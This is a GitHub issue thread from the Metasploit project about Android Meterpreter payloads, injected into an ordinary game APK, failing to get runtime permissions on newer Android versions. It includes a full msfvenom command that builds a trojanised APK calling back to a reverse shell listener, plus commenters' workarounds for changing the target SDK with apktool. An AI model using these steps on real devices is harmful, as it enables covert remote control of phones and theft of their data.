New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
android payload permissions not registered #16208
Comments
Can this be connected with |
Picking up the same problems here with APK files that target any SDK version after Injected Meterpreter Permissions will not be granted automatically and will need to be enabled manually through the Android Device Settings in order for everything to work on the Server Side when using an APK whose SDK version targets anything after
|
You are correct. Any APK with targetsdkversion < 23 is unlikely to have the ability to handle some permissions at runtime on devices running Android 6.0 marshmallow or higher. You'll still get a session but things that require the new runtime permissions, e.g camera, sdcard access may throw a SecurityException |
Thinking about this further, the default android payload (without injection) probably has this issue too. Fixing it would require updating the SDK version and breaking backwards compatibility with Android 5 and lower devices. I made some progress here: rapid7/metasploit-payloads#573 but I don't have the bandwidth currently to finish it off. The user would also have to accept the permission(s) via a popup. You're better off dropping a root exploit and running freely :) |
I'm pretty sure the default payload doesn't have any problems with the permissions being granted, I think because the payload apk is its own application. I think this seems to arise with injection/templating but don't quote me on it I'll have to test this theory later today |
A way around this for the time being is the following, which I've tested on my end with both We can have msfvenom automatically change both the My testing confirms this works in most cases. Unless we have Apktool ignore SDK changes to the |
BRO how can I edit it manually because I can only use apktool that the only compiler I know and apk easy tool also uses apk tool |
Using apktool to decompile the application, then use a text editor to edit things manually |
what do I use to recompile that's my only problem I only use apk tool, so when I try compiling apk tool changed the SDK version back to 23 |
As far as I know that only happens in the manifest but the targetSdk stays the says in the Apktool.yml I know this because I use the work around I've stated above in the "AhMyth Android RAT" project that I currently maintain on my own |
Steps to reproduce
How'd you do it?
I generated the payload using:
sudo msfvenom -x Hangman.com.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.23 lport=4444 -o android_reverse_tcp_local.apk
I later signed the app and installed on my android device
Opened a meterpreter shall and realized I do not have permissions to upload file or even to use
ls
commandI noticed that the app, on the android has no permissions at all and only after manually adding permissions was I able to upload file or use
ls
in meterpreted session.This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
I followed several tutorials all of them show the same method
Expected behavior
full permissions on teh android device
What should happen?
command like
ls
orupload
should workCurrent behavior
Unable to preform command which require app permission
What happens instead?
I got error messages e.g.:
Metasploit version
Framework Version: 6.1.29-dev
Additional Information
If the issue is encountered within
msfconsole
, please run thedebug
command using the instructions below. If the issue is encountered outisdemsfconsole
, or the issue causesmsfconsole
to crash on startup, please delete this section.msfconsole
set loglevel 3
debug
command6
`
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
Database Configuration
The database contains the following information:
Collapse
History
The following commands were ran during the session and before this issue occurred:
Collapse
Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
Version/Install
The versions and install method of your Metasploit setup:
Collapse
The text was updated successfully, but these errors were encountered: